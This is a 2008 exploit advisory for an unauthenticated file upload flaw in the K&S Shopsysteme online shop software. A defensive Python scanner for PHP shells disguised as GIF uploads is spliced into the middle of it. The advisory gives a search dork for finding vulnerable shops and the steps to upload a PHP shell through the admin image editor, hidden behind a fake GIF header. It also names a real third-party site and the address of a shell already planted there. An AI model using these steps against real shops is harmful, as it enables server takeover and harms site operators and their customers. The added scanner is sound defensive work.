# Title : K&S Shopsysteme Arbitrary Remote File Upload Vulnerability
# Published : 2008-12-17
# Author : mNt
## Script Name: Shopsysteme (new version oscommerce)
## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :)
## Author: mNt
## File Upload Bug
## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Results 191 - 200 of about 32,900 for Powered by K&S Media Concept - Shopsysteme (0.51 seconds)]
## Use:
http://www.example.com/
Then add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php
Upload file: PHP shell
Then in the URL: http://www.example.com/images/upload/mNt.php
Attention: Shell Code in GIF89;a
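
A defender-side check for the condition described above, added here as an example and not part of the original advisory: it walks an upload directory such as images/upload and flags files that carry a script extension, contain a PHP open tag, or start with "GIF" without an exact GIF signature. The extension list, function names and sample bytes are assumptions constructed for illustration.

```python
import os

# Extensions a PHP-enabled server may hand to the interpreter (assumed list).
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
GIF_MAGIC = (b"GIF87a", b"GIF89a")  # the only two valid GIF signatures


def classify(name, data):
    """Return the reasons an uploaded file is suspicious (empty list = clean)."""
    reasons = []
    # Check every dot-separated suffix so "x.php.gif" is caught as well.
    suffixes = {"." + part.lower() for part in name.split(".")[1:]}
    if suffixes & SCRIPT_EXTS:
        reasons.append("script-extension")
    # Heuristic: a PHP open tag anywhere in the bytes that were read.
    if b"<?php" in data.lower():
        reasons.append("php-open-tag")
    # Looks like a GIF at first glance, but the 6-byte signature is not exact,
    # e.g. the "GIF89;a" prefix mentioned in the advisory.
    if data[:3] == b"GIF" and data[:6] not in GIF_MAGIC:
        reasons.append("malformed-gif-signature")
    return reasons


def scan_upload_dir(root):
    """Walk an upload directory; map relative path -> reasons for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                data = fh.read(1024 * 1024)  # first 1 MiB is enough here
            reasons = classify(fname, data)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


if __name__ == "__main__":
    import sys
    import tempfile
    root = sys.argv[1] if len(sys.argv) > 1 else tempfile.mkdtemp()
    if len(sys.argv) == 1:  # constructed sample so the script runs with no args
        with open(os.path.join(root, "mNt.php"), "wb") as fh:
            fh.write(b"GIF89;a\n<?php /* constructed sample */ ?>")
    for path, reasons in sorted(scan_upload_dir(root).items()):
        print(path, ",".join(reasons))
```

Any hit in a directory that should hold only images also means the upload script accepted the file without authentication or content validation, so the handler itself needs access control and the directory should not be allowed to execute scripts.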
## Live demo: http://www.trampleandfetish.de/admin/editor/image.php
## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php
## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage
## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net
# www.Syue.com [2008-12-17]